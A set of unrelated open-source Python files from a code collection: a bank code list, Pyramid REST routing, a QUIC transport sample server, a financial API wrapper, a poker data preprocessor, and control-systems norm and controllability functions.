"disabled_for_vnuban": None
},
{
"bank_code":"100013",
"cbn_code":"323",
"name":"Accessmoney",
"bank_short_name":"access-mobile",
"disabled_for_vnuban": None
},
{
"bank_code":"100009",
"cbn_code":"315",
"name":"GT Mobile Money",
"bank_short_name":"gtb-mobile",
"disabled_for_vnuban": None
},
{
"bank_code":"100007",
"cbn_code":"304",
"name":"Stanbic IBTC @Ease Wal",
"bank_short_name":"stanbic-mobile",
"disabled_for_vnuban": None
},
{
"bank_code":"100008",
"cbn_code":"307",
"name":"Ecobank Xpress",
"bank_short_name":"ecobank-mobile",
"disabled_for_vnuban": None
},
{
"bank_code":"100004",
"cbn_code":"999992",
"name":"Paycom (Opay)",
"bank_short_name":"paycom",
"disabled_for_vnuban": None
},
{
"bank_code":"100003",
"cbn_code":"311",
"name":"Parkway-Readycash",
"bank_short_name":"parkway",
"disabled_for_vnuban": None
}
]
return data
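# A small lookup sketch over the list above (hypothetical helper, not part
# of the original module):
#
#   def find_bank(cbn_code):
#       return next((b for b in bankdb() if b['cbn_code'] == cbn_code), None)
#
#   find_bank('058')  # -> the Guaranty Trust Bank entry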
``` |
{
"source": "josephchow102/pyramid_rest_route",
"score": 2
} |
#### File: pyramid_rest_route/pyramid_rest_route/route.py
```python
import logging
import os
from pyramid.security import Everyone,\
Allow, ALL_PERMISSIONS
log = logging.getLogger(__name__)
class PublicFactory(object):
    """
    ACEs with a smaller index in the ACL take higher priority.
    """
__acl__ = None
def __init__(self, request):
log.debug('Init the PublicFactory')
self.__acl__ = [
(Allow, Everyone, ALL_PERMISSIONS),
]
def allowed_extension(*allowed):
    '''
    refs: http://zhuoqiang.me/a/restful-pyramid
    Custom predicate checking whether the file extension
    of the request URI is in the allowed set.
    '''
def predicate(info, request):
log.debug(request.path)
ext = os.path.splitext(request.path)[1]
        request.environ['path_extension'] = ext
log.debug(ext)
return ext in allowed
return predicate
def add_rest_route(config, name, plural, cls, factory=PublicFactory,
collections={}, members={},
url_name=None, url_plural=None, exts=[''], include_view=True):
if url_name is None:
url_name = name
if url_plural is None:
url_plural = plural
config.add_route('formatted_%s' % plural, '/%s.{ext}' % url_plural,
factory=factory)
config.add_route(plural, '/%s' % url_plural, factory=factory)
config.add_route('formatted_new_%s' % name,
'/%s/new.{ext}' % url_name, factory=factory)
config.add_route('new_%s' % name, '/%s/new' % url_name,
factory=factory)
config.add_route('formatted_edit_%s' % name,
'/%s/{id}/edit.{ext}' % url_name, traverse='/{id}', factory=factory)
config.add_route('edit_%s' % name, '/%s/{id}/edit' % url_name,
traverse='/{id}', factory=factory)
config.add_route('formatted_%s' % name,
'/%s/{id}.{ext}' % url_name, traverse='/{id}', factory=factory)
config.add_route('%s' % name, '/%s/{id}' % url_name,
traverse='/{id}', factory=factory)
if include_view:
config.add_view(cls, route_name=plural, permission='view',
attr='index', request_method='GET', renderer=cls.renderers.get('index'))
config.add_view(cls, route_name='formatted_%s' % plural,
permission='view',
attr='index', request_method='GET',
custom_predicates=(allowed_extension(*exts),))
config.add_view(cls, route_name=plural, permission='create',
attr='create', request_method='POST',
renderer=cls.renderers.get('create'))
config.add_view(cls, route_name='formatted_%s' % plural,
permission='create',
attr='create', request_method='POST',
custom_predicates=(allowed_extension(*exts),))
for collection, permission in collections.items():
route_name = '%s_%s' % (plural, collection)
config.add_route(route_name,
'/%s/%s' % (url_plural, collection),
factory=factory)
config.add_route('formatted_%s' % route_name,
'/%s/%s.{ext}' % (url_plural, collection),
factory=factory)
if include_view:
config.add_view(cls, route_name=route_name, permission=permission,
attr=collection,
renderer=cls.renderers.get(collection))
config.add_view(cls, route_name='formatted_%s' % route_name,
permission=permission,
attr=collection,
custom_predicates=(allowed_extension(*exts),))
for member, permission in members.items():
route_name = '%s_%s' % (member, name)
config.add_route(route_name,
'/%s/{id}/%s' % (url_name, member),
traverse='/{id}', factory=factory)
config.add_route('formatted_%s' % route_name,
'/%s/{id}/%s.{ext}' % (url_name, member),
traverse='/{id}', factory=factory)
if include_view:
config.add_view(cls, route_name=route_name,
permission=permission,
attr=member, renderer=cls.renderers.get(member))
config.add_view(cls, route_name='formatted_%s' % route_name,
permission=permission,
attr=member,
custom_predicates=(allowed_extension(*exts),))
if include_view:
config.add_view(cls, route_name='new_%s' % name, permission='create',
attr='new', request_method='GET',
renderer=cls.renderers.get('new'))
config.add_view(cls, route_name='formatted_new_%s' % name,
permission='create',
attr='new', request_method='GET',
custom_predicates=(allowed_extension(*exts),))
config.add_view(cls, route_name='edit_%s' % name, permission='edit',
attr='edit', request_method='GET',
renderer=cls.renderers.get('edit'))
config.add_view(cls, route_name='formatted_edit_%s' % name,
permission='edit',
attr='edit', request_method='GET',
custom_predicates=(allowed_extension(*exts),))
config.add_view(cls, route_name=name, permission='view',
attr='view', request_method='GET',
renderer=cls.renderers.get('view'))
config.add_view(cls, route_name='formatted_%s' % name,
permission='view',
attr='view', request_method='GET')
config.add_view(cls, route_name=name, permission='edit',
attr='update', request_method='PUT',
renderer=cls.renderers.get('update'))
config.add_view(cls, route_name='formatted_%s' % name,
permission='edit',
attr='update', request_method='PUT',
custom_predicates=(allowed_extension(*exts),))
config.add_view(cls, route_name=name, permission='edit',
attr='update', request_method='POST',
renderer=cls.renderers.get('update'))
config.add_view(cls, route_name='formatted_%s' % name,
permission='edit',
attr='update', request_method='POST',
custom_predicates=(allowed_extension(*exts),))
config.add_view(cls, route_name=name, permission='edit',
attr='delete', request_method='DELETE',
renderer=cls.renderers.get('delete'))
config.add_view(cls, route_name='formatted_%s' % name,
permission='edit',
attr='delete', request_method='DELETE',
custom_predicates=(allowed_extension(*exts),))
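# Typical wiring in a Pyramid application (illustrative; `UserView` and its
# `renderers` mapping are assumptions, not part of this module):
#
#   config.add_directive('add_rest_route', add_rest_route)
#   config.add_rest_route('user', 'users', UserView, exts=['', '.json'])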
``` |
{
"source": "JosephCHS/CNN-Image-Detection",
"score": 3
} |
#### File: CNN-Image-Detection/model/list_node_pbtxt.py
```python
import tensorflow as tf
from google.protobuf import text_format
# tf.GraphDef moved under tf.compat.v1 in TensorFlow 2.x; the alias below
# works on both TF1 and TF2.
with open('graph.pbtxt') as f:
    graph_def = text_format.Parse(f.read(), tf.compat.v1.GraphDef())
print([n.name for n in graph_def.node])
``` |
{
"source": "JosephClarkClayton/samples",
"score": 3
} |
#### File: samples/quictransport/quic_transport_server.py
```python
import argparse
import asyncio
import io
import os
import struct
import urllib.parse
from collections import defaultdict
from typing import Dict, Optional
from aioquic.asyncio import QuicConnectionProtocol, serve
from aioquic.quic.configuration import QuicConfiguration
from aioquic.quic.connection import QuicConnection, END_STATES
from aioquic.quic.events import StreamDataReceived, StreamReset, DatagramFrameReceived, QuicEvent
from aioquic.tls import SessionTicket
BIND_ADDRESS = '::1'
BIND_PORT = 4433
ALLOWED_ORIGINS = {'localhost', 'googlechrome.github.io'}
# QUIC uses two lowest bits of the stream ID to indicate whether the stream is:
# (a) unidirectional or bidirectional,
# (b) initiated by the client or by the server.
# See https://tools.ietf.org/html/draft-ietf-quic-transport-27#section-2.1 for
# more details.
def is_client_bidi_stream(stream_id):
return stream_id % 4 == 0
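# e.g. stream IDs 0, 4, 8, ... are client-initiated bidirectional streams;
# stream 2 (used below for the client indication) is the first
# client-initiated unidirectional stream.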
# CounterHandler implements a really simple protocol:
# - For every incoming bidirectional stream, it counts bytes it receives on
# that stream until the stream is closed, and then replies with that byte
# count on the same stream.
# - For every incoming unidirectional stream, it counts bytes it receives on
# that stream until the stream is closed, and then replies with that byte
# count on a new unidirectional stream.
# - For every incoming datagram, it sends a datagram with the length of
# datagram that was just received.
class CounterHandler:
def __init__(self, connection) -> None:
self.connection = connection
self.counters = defaultdict(int)
def quic_event_received(self, event: QuicEvent) -> None:
if isinstance(event, DatagramFrameReceived):
payload = str(len(event.data)).encode('ascii')
self.connection.send_datagram_frame(payload)
if isinstance(event, StreamDataReceived):
self.counters[event.stream_id] += len(event.data)
if event.end_stream:
if is_client_bidi_stream(event.stream_id):
response_id = event.stream_id
else:
response_id = self.connection.get_next_available_stream_id(
is_unidirectional=True)
payload = str(self.counters[event.stream_id]).encode('ascii')
self.connection.send_stream_data(response_id, payload, True)
del self.counters[event.stream_id]
# Streams in QUIC can be closed in two ways: normal (FIN) and abnormal
# (resets). FIN is handled by event.end_stream logic above; the code
# below handles the resets.
if isinstance(event, StreamReset):
try:
del self.counters[event.stream_id]
except KeyError:
pass
# QuicTransportProtocol handles the beginning of a QuicTransport connection: it
# parses the incoming URL, and routes the transport events to a relevant
# handler (in this example, CounterHandler). It does that by waiting for a
# client indication (a special stream with protocol headers), and buffering all
# unrelated events until the client indication can be fully processed.
class QuicTransportProtocol(QuicConnectionProtocol):
def __init__(self, *args, **kwargs) -> None:
super().__init__(*args, **kwargs)
self.pending_events = []
self.handler = None
self.client_indication_data = b''
def quic_event_received(self, event: QuicEvent) -> None:
try:
if self.is_closing_or_closed():
return
# If the handler is available, that means the connection has been
# established and the client indication has been processed.
if self.handler is not None:
self.handler.quic_event_received(event)
return
if isinstance(event, StreamDataReceived) and event.stream_id == 2:
self.client_indication_data += event.data
if event.end_stream:
self.process_client_indication()
if self.is_closing_or_closed():
return
# Pass all buffered events into the handler now that it's
# available.
for e in self.pending_events:
self.handler.quic_event_received(e)
self.pending_events.clear()
else:
# We have received some application data before we have the
# request URL available, which is possible since there is no
# ordering guarantee on data between different QUIC streams.
# Buffer the data for now.
self.pending_events.append(event)
        except Exception:
self.handler = None
self.close()
# Client indication follows a "key-length-value" format, where key and
# length are 16-bit integers. See
# https://tools.ietf.org/html/draft-vvv-webtransport-quic-01#section-3.2
def parse_client_indication(self, bs):
while True:
prefix = bs.read(4)
if len(prefix) == 0:
return # End-of-stream reached.
if len(prefix) != 4:
raise Exception('Truncated key-length tag')
key, length = struct.unpack('!HH', prefix)
value = bs.read(length)
if len(value) != length:
raise Exception('Truncated value')
yield (key, value)
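    # For reference, a conforming client indication for origin
    # "https://localhost" and path "/counter" could be built like this
    # (hypothetical helper, not part of the original sample):
    #
    #   def build_client_indication(origin: bytes, path: bytes) -> bytes:
    #       return (struct.pack('!HH', 0, len(origin)) + origin +
    #               struct.pack('!HH', 1, len(path)) + path)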
def process_client_indication(self) -> None:
KEY_ORIGIN = 0
KEY_PATH = 1
indication = dict(
self.parse_client_indication(io.BytesIO(
self.client_indication_data)))
origin = urllib.parse.urlparse(indication[KEY_ORIGIN].decode())
        path = urllib.parse.urlparse(indication[KEY_PATH].decode())
# Verify that the origin host is allowed to talk to this server. This
# is similar to the CORS (Cross-Origin Resource Sharing) mechanism in
# HTTP. See <https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS>.
if origin.hostname not in ALLOWED_ORIGINS:
raise Exception('Wrong origin specified')
# Dispatch the incoming connection based on the path specified in the
# URL.
if path.path == '/counter':
self.handler = CounterHandler(self._quic)
else:
raise Exception('Unknown path')
def is_closing_or_closed(self) -> bool:
return self._quic._close_pending or self._quic._state in END_STATES
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('certificate')
parser.add_argument('key')
args = parser.parse_args()
configuration = QuicConfiguration(
# Identifies the protocol used. The origin trial uses the protocol
# described in draft-vvv-webtransport-quic-01, hence the ALPN value.
# See https://tools.ietf.org/html/draft-vvv-webtransport-quic-01#section-3.1
alpn_protocols=['wq-vvv-01'],
is_client=False,
# Note that this is just an upper limit; the real maximum datagram size
# available depends on the MTU of the path. See
# <https://en.wikipedia.org/wiki/Maximum_transmission_unit>.
max_datagram_frame_size=1500,
)
configuration.load_cert_chain(args.certificate, args.key)
loop = asyncio.get_event_loop()
loop.run_until_complete(
serve(
BIND_ADDRESS,
BIND_PORT,
configuration=configuration,
create_protocol=QuicTransportProtocol,
))
loop.run_forever()
``` |
{
"source": "josephcobb111/AlgoTrading",
"score": 2
} |
#### File: josephcobb111/AlgoTrading/setup.py
```python
import codecs
import os
import versioneer
from setuptools import setup, find_packages
def read(*parts):
"""
Build an absolute path from *parts* and return the contents of the
resulting file. Assume UTF-8 encoding.
"""
with codecs.open(os.path.join(HERE, *parts), "rb", "utf-8") as f:
return f.read()
def install_dependencies(links):
"""
Install dependency links
"""
for link in links:
        os.system("pip install " + link + " --upgrade")
# INSTALL_REQUIRES and DEPENDENCY_LINKS are populated from requirements.txt
# below; the empty lists here are just placeholders.
INSTALL_REQUIRES = []
DEPENDENCY_LINKS = []
HERE = os.path.abspath(os.path.dirname(__file__))
# read dependencies from requirements.txt
INSTALL_REQUIRES = [
x
for x in read("requirements.txt").split("\n")
if x != ""
and not x.startswith("#")
and not x.startswith("-e")
and not x.startswith("git+")
]
DEPENDENCY_LINKS = [
x for x in read("requirements.txt").split("\n") if x.startswith("git+")
]
if __name__ == "__main__":
install_dependencies(DEPENDENCY_LINKS)
setup(
name="algotrading",
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
author="<NAME>",
author_email="<EMAIL>",
url="https://github.com/josephcobb111/AlgoTrading",
description="Package to support financial analyses.",
include_package_data=True,
dependency_links=DEPENDENCY_LINKS,
install_requires=INSTALL_REQUIRES,
packages=find_packages(),
)
``` |
{
"source": "JosephCottingham/financialmodelingprep-python",
"score": 3
} |
#### File: financialmodelingprep-python/financialmodelingprep/calendars.py
```python
from financialmodelingprep.decorator import get_json_data
BASE_URL = 'https://financialmodelingprep.com'
class calendars():
BASE_URL = 'https://financialmodelingprep.com'
def __init__(self, API_KEY):
self.API = API_KEY
@get_json_data
def earning_calendar(self):
'''
Earnings Calendar
'''
return f'{self.BASE_URL}/api/v3/earning_calendar?apikey={self.API}'
@get_json_data
def earning_calendar_period(self, datetime_from, datetime_to):
'''
        Earnings calendar for a given date range
'''
return f'{self.BASE_URL}/api/v3/earning_calendar?from={datetime_from.strftime("%Y-%m-%d")}&to={datetime_to.strftime("%Y-%m-%d")}&apikey={self.API}'
@get_json_data
def company_historical_earnings_calendar(self, ticker: str, limit: int):
'''
        Historical earnings calendar for a given ticker
'''
return f'{self.BASE_URL}/api/v3/historical/earning_calendar/{ticker}?limit={str(limit)}&apikey={self.API}'
@get_json_data
def ipo_calendar(self, datetime_from, datetime_to):
'''
        IPO calendar for a given date range
'''
return f'{self.BASE_URL}/api/v3/ipo_calendar?from={datetime_from.strftime("%Y-%m-%d")}&to={datetime_to.strftime("%Y-%m-%d")}&apikey={self.API}'
@get_json_data
def stock_split_calendar(self, datetime_from, datetime_to):
'''
        Stock split calendar for a given date range
'''
return f'{self.BASE_URL}/api/v3/stock_split_calendar?from={datetime_from.strftime("%Y-%m-%d")}&to={datetime_to.strftime("%Y-%m-%d")}&apikey={self.API}'
@get_json_data
def stock_dividend_calendar(self, datetime_from, datetime_to):
'''
        Stock dividend calendar for a given date range
'''
return f'{self.BASE_URL}/api/v3/stock_dividend_calendar?from={datetime_from.strftime("%Y-%m-%d")}&to={datetime_to.strftime("%Y-%m-%d")}&apikey={self.API}'
@get_json_data
def economic_calendar(self, datetime_from, datetime_to):
'''
        Economic calendar for a given date range
'''
return f'{self.BASE_URL}/api/v3/economic_calendar?from={datetime_from.strftime("%Y-%m-%d")}&to={datetime_to.strftime("%Y-%m-%d")}&apikey={self.API}'
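# Minimal usage sketch (requires a valid API key; the `get_json_data`
# decorator is assumed to fetch the returned URL and deserialize the JSON):
#
#   from datetime import datetime
#   cal = calendars('YOUR_API_KEY')
#   ipos = cal.ipo_calendar(datetime(2021, 1, 1), datetime(2021, 3, 31))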
``` |
{
"source": "JosephCottingham/poker-texas-holdem-bot",
"score": 3
} |
#### File: poker-texas-holdem-bot/Game-Data-Preprocessing/player_game.py
```python
from card_map import suit_map, rank_map
import pickle
import itertools
with open('hand-classication-model.pickle', 'rb') as f:
    hand_strength_model = pickle.load(f)
# Helper Functions
def combinationsNoOrder(a, n):
if n == 1:
for x in a:
yield [x]
else:
for i in range(len(a)):
for x in combinationsNoOrder(a[:i], n-1):
yield [a[i]] + x
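# e.g. list(combinationsNoOrder([1, 2, 3], 2)) yields [[2, 1], [3, 1], [3, 2]]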
def Merge(dict1, dict2):
res = {**dict1, **dict2}
return res
class Player_Game():
    def __init__(self, player_stats, game, total_chips):
        self.player_name = player_stats['name']
        self.player_chips = player_stats['chips']
        self.game = game
        self.total_chips = total_chips
        # Keep mutable state on the instance; class-level lists/dicts would
        # be shared (and corrupted) across Player_Game instances.
        self.winner_list = []
        self.winner_hands = []
        self.player_chips_in_pot = 0
        self.pot_chips = 0
        self.last_move = None
        self.player_hand = {'S1': 0, 'C1': 0, 'S2': 0, 'C2': 0}
        self.community_hand = {
            'S3': 0, 'C3': 0, 'S4': 0, 'C4': 0, 'S5': 0, 'C5': 0,
            'S6': 0, 'C6': 0, 'S7': 0, 'C7': 0
        }
        self.stage = -1
        self.flop_index = None
        self.turn_index = None
        self.river_index = None
        self.summary_index = None
        self.game_complete = False
def set_hand(self):
hand_str = ''
for line in self.game:
if f'Dealt to {self.player_name}' in line:
h_start, h_end = line.find('[')+1, line.find(']')
hand_str = line[h_start:h_end]
h1, h2 = hand_str.split(' ')
self.player_hand['C1'] = rank_map[h1[0]]
self.player_hand['C2'] = rank_map[h2[0]]
self.player_hand['S1'] = suit_map[h1[1]]
self.player_hand['S2'] = suit_map[h2[1]]
def set_winner_list(self):
for line in self.game:
if 'collected' in line:
self.winner_list.append(line.split(' ')[0])
def set_winner_hands(self):
for winner in self.winner_list:
hand_str = ''
for line in self.game:
                if f'Dealt to {winner}' in line:
h_start, h_end = line.find('[')+1, line.find(']')
hand_str = line[h_start:h_end]
h1, h2 = hand_str.split(' ')
winner_hand = {}
winner_hand['S1'] = suit_map[h1[1]]
winner_hand['S2'] = suit_map[h2[1]]
winner_hand['C1'] = rank_map[h1[0]]
winner_hand['C2'] = rank_map[h2[0]]
self.winner_hands.append(winner_hand)
def get_current_status(self, stage):
data = Merge(self.player_hand, self.community_hand)
if (stage < 3):
data['C7'] = 0
data['S7'] = 0
if (stage < 2):
data['C6'] = 0
data['S6'] = 0
if (stage < 1):
data['C3'] = 0
data['S3'] = 0
data['C4'] = 0
data['S4'] = 0
data['C5'] = 0
data['S5'] = 0
data['percentage_of_total_chips_hand'] = self.player_chips/self.total_chips
data['percentage_of_hand_bet_pot'] = self.player_chips_in_pot/self.player_chips
data['percentage_of_total_chips_in_pot'] = self.pot_chips/self.total_chips
data['current_stage'] = self.stage
data['move'] = self.last_move
data['player_hand_ranking'] = self.rank_hand(Merge(self.player_hand, self.community_hand))
return data
def rank_hand(self, data):
suit_keys = ['S1','S2','S3','S4','S5','S6','S7']
rank_keys = ['C1','C2','C3','C4','C5','C6','C7']
index_list = range(7)
player_hand_rank = 0
for index_list in combinationsNoOrder(index_list, 5):
s_list = []
r_list = []
index_list_sorted = sorted(index_list)
for index in index_list_sorted:
r_list.append(data[rank_keys[index]])
s_list.append(data[suit_keys[index]])
            # The model expects a single 2D sample: ranks followed by suits.
            features = [r_list + s_list]
            temp_hand_rank = hand_strength_model.predict(features)[0]
if temp_hand_rank > player_hand_rank:
player_hand_rank = temp_hand_rank
return player_hand_rank
def _reset(self):
self.pot_chips=0
self.player_chips_in_pot=0
self.flop_index = None
self.turn_index = None
self.river_index = None
        self.summary_index = None
def process_preflop(self):
self.stage = 0
self._reset()
for index, line in enumerate(self.game):
self._process_line(line)
if '*** FLOP ***' in line:
self.flop_index = index
return
self.game_complete = True
def process_postflop(self):
        if self.flop_index is None or self.turn_index is not None:
raise Exception('Process Preflop Must Be Run First')
self.stage = 1
line = self.game[self.flop_index]
start, end = line.find('[')+1, line.find(']')
cards_str = line[start:end]
h3,h4,h5 = cards_str.split(' ')
self.community_hand['C3'] = rank_map[h3[0]]
self.community_hand['C4'] = rank_map[h4[0]]
self.community_hand['C5'] = rank_map[h5[0]]
self.community_hand['S3'] = suit_map[h3[1]]
self.community_hand['S4'] = suit_map[h4[1]]
self.community_hand['S5'] = suit_map[h5[1]]
for index in range(self.flop_index, len(self.game)):
line = self.game[index]
self._process_line(line)
if '*** TURN ***' in line:
self.turn_index = index
return
self.game_complete = True
def process_postturn(self):
self.stage = 2
line = self.game[self.turn_index]
start, end = line.find('[', 24)+1, line.find(']', 25)
cards_str = line[start:end]
h6 = cards_str
self.community_hand['C6'] = rank_map[h6[0]]
self.community_hand['S6'] = suit_map[h6[1]]
for index in range(self.turn_index, len(self.game)):
line = self.game[index]
self._process_line(line)
if '*** RIVER ***' in line:
self.river_index = index
return
self.game_complete = True
def process_postriver(self):
self.stage = 3
line = self.game[self.river_index]
start, end = line.find('[', 29)+1, line.find(']', 29)
cards_str = line[start:end]
h7 = cards_str
self.community_hand['C7'] = rank_map[h7[0]]
self.community_hand['S7'] = suit_map[h7[1]]
for index in range(self.river_index, len(self.game)):
line = self.game[index]
self._process_line(line)
if '*** SUMMARY ***' in line:
self.game_complete = True
return
self.game_complete = True
def _process_line(self, line):
if 'posts small blind' in line or 'posts big blind' in line:
val = int(line.split(' ')[-1])
self.pot_chips += val
if self.player_name in line:
self.player_chips_in_pot += val
if 'raises' in line:
index = -3
if 'all-in' in line:
index = -6
val = int(line.split(' ')[index])
self.pot_chips += val
if self.player_name in line:
self.player_chips_in_pot += val
self.last_move = 2
if 'calls' in line:
index = -1
if 'all-in' in line:
index = -4
val = int(line.split(' ')[index])
self.pot_chips += val
if self.player_name in line:
self.player_chips_in_pot += val
self.last_move = 1
if 'folds' in line and self.player_name in line:
self.last_move = 0
self.game_complete = True
def gather_full_game_data(self):
records = []
self.set_hand()
self.set_winner_list()
self.process_preflop()
records.append(self.get_current_status(0))
if self.game_complete != True:
self.process_postflop()
records.append(self.get_current_status(1))
if self.game_complete != True:
self.process_postturn()
records.append(self.get_current_status(2))
if self.game_complete != True:
self.process_postriver()
records.append(self.get_current_status(3))
self.set_winner_hands()
won = self.player_name in self.winner_list
for record in records:
if won:
record['result'] = 1
else:
winning_hand_rank = 0
for hand in self.winner_hands:
rank = self.rank_hand(Merge(hand, self.community_hand))
if rank > winning_hand_rank:
winning_hand_rank = rank
player_hand_rank = self.rank_hand(Merge(self.player_hand, self.community_hand))
record['result'] = 1
if winning_hand_rank < player_hand_rank:
record['result'] = 0
return records
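# Example driver (illustrative; hand-history lines come from the poker
# site's exported log, and player_stats is parsed upstream):
#
#   lines = open('hand_history.txt').read().splitlines()
#   pg = Player_Game({'name': 'Hero', 'chips': 1000}, lines, total_chips=10000)
#   records = pg.gather_full_game_data()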
``` |
{
"source": "josephcrosmanplays532/Wrapper-Offline-1.2.3-",
"score": 3
} |
#### File: autoScripts/lib/ADM_imageInfo.py
```python
import ADM_image
# Recompute dest image source/dest
# Taking aspect ratio into account
# Ported from js mean (c) 2011
#
aspectRatio=[
(1.,0.888888,1.185185), # NTSC 1:1 4:3 16:9
(1.,1.066667,1.422222), # PAL 1:1 4:3 16:9
(1.,0.888888,1.185185), # FILM 1:1 4:3 16:9
]
fps_predef=[ 29970, 25000, 23976]
def get_video_format(desc):
    # `Avidemux()` is provided by Avidemux's embedded scripting runtime;
    # the incoming `desc` argument is recomputed below.
    adm = Avidemux()
##########################
# Compute resize...
##########################
source=ADM_image.image()
fps=adm.getFps1000()
fmt=source.getFormat(fps)
print("Fps : "+str(fps))
print("Format : "+str(fmt))
if(fmt==ADM_image.FMT_UNKNOWN):
return None
desc="NTSC"
if(fmt==ADM_image.FMT_FILM):
desc="FILM"
if(fmt==ADM_image.FMT_PAL):
desc="PAL"
print("Format : "+str(desc))
return fmt
``` |
{
"source": "josephcslater/harold",
"score": 3
} |
#### File: harold/harold/_system_props.py
```python
import numpy as np
from numpy import count_nonzero, block
from numpy.linalg.linalg import (_assertRank2, _assertNdSquareness,
_assertNoEmpty2d, _makearray)
from scipy.linalg import solve, norm, eigvals, qr
from ._frequency_domain import frequency_response
from ._classes import Transfer, transfer_to_state
from ._solvers import lyapunov_eq_solver
from ._arg_utils import _check_for_state_or_transfer
__all__ = ['system_norm', 'controllability_indices']
def system_norm(G, p=np.inf, hinf_tol=1e-6, eig_tol=1e-8):
"""
    Computes the system p-norm. Currently, no balancing is done on the
    system; however, a scaling of some sort may be introduced in the future.
    Currently, only the H₂- and H∞-norms are understood.
    For the H₂-norm, the standard Gramian definition via the controllability
    Gramian, which can be found elsewhere, is used.
Parameters
----------
G : {State,Transfer}
System for which the norm is computed
    p : {int, np.inf}
        The norm type; `np.inf` for the H∞-norm and `2` for the H₂-norm
hinf_tol: float
When the progress is below this tolerance the result is accepted
as converged.
eig_tol: float
The algorithm relies on checking the eigenvalues of the Hamiltonian
being on the imaginary axis or not. This value is the threshold
such that the absolute real value of the eigenvalues smaller than
this value will be accepted as pure imaginary eigenvalues.
Returns
-------
n : float
Resulting p-norm
Notes
-----
    The H∞-norm is computed via the so-called BBBS algorithm ([1]_, [2]_).
    .. [1] <NAME>, <NAME>: Fast Computation of the H∞-norm of a
        transfer function. Systems & Control Letters, 14, 1990.
        :doi:`10.1016/0167-6911(90)90049-Z`
    .. [2] <NAME> and <NAME>. A regularity result for the singular
        values of a transfer matrix and a quadratically convergent
        algorithm for computing its L∞-norm. Systems & Control Letters,
        1990. :doi:`10.1016/0167-6911(90)90037-U`
"""
# TODO: Try the corrections given in arXiv:1707.02497
_check_for_state_or_transfer(G)
if p not in (2, np.inf):
raise ValueError('The p in p-norm is not 2 or infinity. If you'
' tried the string \'inf\', use "np.inf" instead')
T = transfer_to_state(G) if isinstance(G, Transfer) else G
a, b, c, d = T.matrices
    # 2-norm
    if p == 2:
        # Handle trivial infinities
        if T._isgain:
            # If nonzero -> infinity, if zero -> zero
            if count_nonzero(T.d) > 0:
                return np.inf
            else:
                return 0.
        if not T._isstable:
            return np.inf
if T.SamplingSet == 'R':
x = lyapunov_eq_solver(a.T, b @ b.T)
return np.sqrt(np.trace(c @ x @ c.T))
else:
x = lyapunov_eq_solver(a.T, b @ b.T, form='d')
return np.sqrt(np.trace(c @ x @ c.T + d @ d.T))
    # ∞-norm
    elif np.isinf(p):
        if not T._isstable:
            return np.inf
# Initial gamma0 guess
# Get the max of the largest svd of either
# - feedthrough matrix
# - G(iw) response at the pole with smallest damping
# - G(iw) at w = 0
# Formula (4.3) given in Bruinsma, Steinbuch Sys.Cont.Let. (1990)
if any(T.poles.imag):
J = [np.abs(x.imag/x.real/np.abs(x)) for x in T.poles]
ind = np.argmax(J)
low_damp_fr = np.abs(T.poles[ind])
else:
low_damp_fr = np.min(np.abs(T.poles))
f, w = frequency_response(T, w=[0, low_damp_fr], w_unit='rad/s',
output_unit='rad/s')
if T._isSISO:
lb = np.max(np.abs(f))
else:
# Only evaluated at two frequencies, 0 and wb
lb = np.max(norm(f, ord=2, axis=2))
# Finally
gamma_lb = np.max([lb, norm(d, ord=2)])
# Start a for loop with a definite end! Convergence is quartic!!
for x in range(51):
# (Step b1)
test_gamma = gamma_lb * (1 + 2*np.sqrt(np.spacing(1.)))
# (Step b2)
R = d.T @ d - test_gamma**2 * np.eye(d.shape[1])
S = d @ d.T - test_gamma**2 * np.eye(d.shape[0])
# TODO : Implement the result of Benner for the Hamiltonian later
mat = block([[a - b @ solve(R, d.T) @ c,
-test_gamma * b @ solve(R, b.T)],
[test_gamma * c.T @ solve(S, c),
-(a - b @ solve(R, d.T) @ c).T]])
eigs_of_H = eigvals(mat)
# (Step b3)
im_eigs = eigs_of_H[np.abs(eigs_of_H.real) <= eig_tol]
# If none left break
if im_eigs.size == 0:
gamma_ub = test_gamma
break
else:
# Take the ones with positive imag part
w_i = np.sort(np.unique(np.abs(im_eigs.imag)))
# Evaluate the cubic interpolant
m_i = (w_i[1:] + w_i[:-1]) / 2
f, w = frequency_response(T, w=m_i, w_unit='rad/s',
output_unit='rad/s')
if T._isSISO:
gamma_lb = np.max(np.abs(f))
else:
gamma_lb = np.max(norm(f, ord=2, axis=2))
return (gamma_lb + gamma_ub)/2
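# Minimal usage sketch (illustrative):
#
#   from harold import Transfer
#   G = Transfer(1, [1, 2, 5])
#   system_norm(G, p=2)   # H2-norm
#   system_norm(G)        # H-infinity norm (default p=np.inf)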
def controllability_indices(A, B, tol=None):
"""Computes the controllability indices for a controllable pair (A, B)
Controllability indices are defined as the maximum number of independent
columns per input column of B in the following sense: consider the Kalman
controllability matrix (widely known as Krylov sequence) ::
C = [B, AB, ..., A^(n-1)B]
We start testing (starting from the left-most) every column of this matrix
whether it is a linear combination of the previous columns. Obviously,
since C is (n x nm), there are many ways to pick a linearly independent
subset. We select a version from [1]_. If a new column is dependent
we delete that column and keep doing this until we are left with a
full-rank square matrix (this is guaranteed if (A, B) is controllable).
Then at some point, we are necessarily left with columns that are obtained
from different input columns ::
ฬ
C = [bโ,bโ,bโ...,Abโ,Abโ,...,Aยฒbโ,Aยฒbโ,...,Aโฝแตโปยนโพbโ,...]
For example, it seems like Abโ is deleted due to dependence on the previous
columns to its left. It can be shown that the higher powers will also be
dependent and can be removed too. By reordering these columns, we combine
the terms that involve each bโฑผ ::
ฬ
C = [bโ,Abโ,Aยฒbโ,bโ,bโ,Abโ,Aยฒbโ,...,Aโฝแตโปยนโพbโ,...]
The controllability index associated with each input column is defined as
the number of columns per bโฑผ appearing in the resulting matrix. Here, 3
for first input 1 for second and so on.
If B is not full rank then the index will be returned as 0 as that column
bโฑผ will be dropped too.
Parameters
----------
A : ndarray
2D (n, n) real-valued array
B : ndarray
2D (n, m) real-valued array
tol : float
Tolerance value for the Arnoldi iteration to decide linear dependence.
        By default it is `sqrt(eps)*n²`
Returns
-------
ind : ndarray
1D array that holds the computed controllability indices. The sum of
the values add up to `n` if (A, B) is controllable.
Notes
-----
Though internally not used, this function can also be used as a
controllability/observability test by summing up the resulting indices and
comparing to `n`.
References
----------
.. [1] : <NAME>, "Linear Multivariable Control: A Geometric Approach",
3rd edition, 1985, Springer, ISBN:9780387960715
"""
